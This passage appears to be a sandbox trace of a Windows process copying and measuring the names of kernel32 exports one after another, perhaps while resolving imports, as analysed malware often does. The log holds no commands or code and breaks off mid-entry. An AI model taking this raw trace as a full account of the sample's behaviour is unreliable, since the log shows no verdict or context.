lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.341] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.341] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.341] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.341] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.341] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.342] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.342] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.342] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.342] lstrlenA (lpString="BEEP") returned 4 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.342] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.342] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.342] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.342] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.342] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.342] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.342] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.342] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.342] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.342] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.342] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.342] lstrlenA (lpString="CANCELIO") returned 8 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.342] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.342] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.342] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.342] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.343] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.343] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.343] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.343] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.343] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.343] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.343] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.343] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.343] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.343] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.343] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.343] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.343] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.343] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.343] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.343] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.343] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.343] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.343] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.343] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.344] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.344] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.344] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.344] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.344] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.344] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.344] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.344] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.344] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.344] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.344] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.344] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.344] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.344] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.344] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.344] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.344] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.344] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.344] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.344] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.345] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.345] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.345] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.345] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.345] lstrlenA (lpString="COPYFILEA") returned 9 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.345] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.345] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.345] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.345] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.345] lstrlenA (lpString="COPYFILEW") returned 9 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.345] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.345] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.345] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.345] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.345] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.345] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.345] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.345] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.345] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.345] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.346] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.346] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.346] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.346] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.346] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.346] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.346] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.346] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.346] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.346] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.346] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.346] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.346] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.346] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.346] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.346] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.346] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.346] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.346] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.346] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.347] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.347] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.347] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.347] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.347] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.347] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.347] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.347] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.347] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.347] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.347] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.347] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.347] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.347] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.347] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.347] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.347] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.347] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.347] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.347] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.348] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.348] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.348] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.348] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.348] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.348] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.348] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.348] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.348] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.348] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.348] 